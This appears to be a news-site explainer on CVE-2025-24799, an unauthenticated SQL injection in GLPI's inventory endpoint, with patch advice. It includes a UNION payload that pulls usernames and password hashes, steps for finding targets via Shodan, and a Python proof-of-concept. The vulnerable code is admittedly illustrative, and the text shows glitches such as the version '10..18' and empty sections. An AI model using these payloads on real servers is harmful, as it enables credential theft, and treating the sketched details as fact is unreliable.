CVE CyberSecurity Database News

CVE-2025-24799 - Critical SQL Injection in GLPI Inventory Endpoint – How Attackers Exploit and How to Stay Safe

Poster -

GLPI is one of the world's most popular open-source asset and IT management systems. Many sysadmins and IT teams rely on it to keep track of users, computers, software, and tickets. But a newly disclosed vulnerability—CVE-2025-24799—puts unpatched systems at serious risk. Let’s break down what went wrong, see how attackers can use it, and what you must do to protect your systems.

What is CVE-2025-24799?

CVE-2025-24799 is a critical SQL injection vulnerability discovered in GLPI before version 10..18. The flaw lets anyone—including unauthenticated users—send harmful data (SQL queries) to the database through the system’s inventory endpoint. Attackers could steal or change nearly any data in your GLPI instance, or even obtain credentials.

Short summary:
> _An unauthenticated user can perform a SQL injection through the inventory endpoint. This vulnerability is fixed in GLPI version 10..18._

Where’s the Bug?

The heart of the vulnerability lies in how GLPI handles data sent to its /inventory endpoint. Particularly, it doesn’t properly sanitize input from incoming requests before sending it to the SQL database.

For instance, a POST request like this

POST /glpi/inventory HTTP/1.1
Host: your-glpi-server.com
Content-Type: application/json

{
    "search": "keyword"
}

If the user input ("keyword") is inserted unchecked into an SQL query, an attacker can inject raw SQL code, breaking out of the intended context and running commands.

Suppose the vulnerable code is like this (not actual GLPI code, but for illustration)

$query = "SELECT * FROM assets WHERE name LIKE '%".$_POST['search']."%'";

An attacker might send

{
    "search": "a%' UNION SELECT 1,user,2,password FROM glpi_users--"
}

That would make the backend send this dangerous SQL

SELECT * FROM assets WHERE name LIKE '%a%' UNION SELECT 1,user,2,password FROM glpi_users--%'

This query fetches username and password hashes from the glpi_users table — and returns them instead of the normal asset list!

Step 1: Find a GLPI server (using tools like Shodan, Censys).

- Step 2: Send crafted POST request to /inventory as shown above.

A Python example for security research (do not run against systems you don’t own!)

import requests

url = "http://your-glpi-server.com/glpi/inventory";
payload = {
    "search": "a%' UNION SELECT 1,user,2,password FROM glpi_users--"
}
headers = {
    "Content-Type": "application/json"
}

response = requests.post(url, json=payload, headers=headers)
print(response.text)

How Bad Is It?

This is as bad as SQL injection gets:

How Do I Fix It?

Simple! Update GLPI to at least version 10..18. The maintainers fixed the issue. You’ll find the latest releases here:

- GLPI Downloads Page

If you must run an older version, restrict access to trusted IPs only, or use a WAF (Web Application Firewall) to block malicious patterns—this is only a stopgap.

References

- GLPI Security Advisory for 10..18 *(replace with actual link when available)*
- CVE-2025-24799 at NVD
- Official GLPI GitHub Repository

[ ] Am I monitoring logs for strange access?

If you answer “No” to any of the above, act now!

Conclusion

SQL injection is an old but devastating flaw, and CVE-2025-24799 is a textbook example. Don’t let attackers walk in your digital front door. Update GLPI now, audit your installations, and always treat user input with caution.

Timeline

Published on: 03/18/2025 19:15:48 UTC